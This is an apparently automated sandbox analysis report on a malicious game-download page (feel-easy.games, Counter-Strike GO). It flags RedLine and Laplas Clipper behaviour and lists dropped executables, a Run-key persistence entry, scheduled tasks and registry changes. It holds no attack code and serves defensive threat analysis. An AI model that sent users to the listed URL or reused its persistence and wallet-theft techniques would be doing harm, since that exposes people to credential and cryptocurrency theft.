Analysis Overview
Threat Level: Known bad
The file https://feel-easy.games/catalog/counter-strike-go/ was found to be: Known bad.
Malicious Activity Summary
Laplas Clipper
RedLine
Downloads MZ/PE file
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
GoLang User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Creates scheduled task(s)
Views/modifies file attributes
NTFS ADS
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-01 21:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-01 21:13
Reported
2023-08-01 21:16
Platform
win10-20230703-en
Max time kernel
193s
Max time network
196s
Command Line
Signatures
Laplas Clipper
RedLine
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\Setup_Repack\Setup_Repack\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\4183903823\810424605.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\3877292338.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "407" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile - English (United States)" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\media.net\NumberOfSubdomains = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "51" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "641" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "804" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "409" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "DebugPlugin" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{06405088-BC01-4E08-B392-5303E75090C8}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e2872416bdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\7-Zip\7zG.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pubmatic.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Near" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2013.1022" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cec7481dbdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SW" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "769" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ads.pubmatic.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6;18;22" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6e-1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "289" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Adult" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "397705972" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "971" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
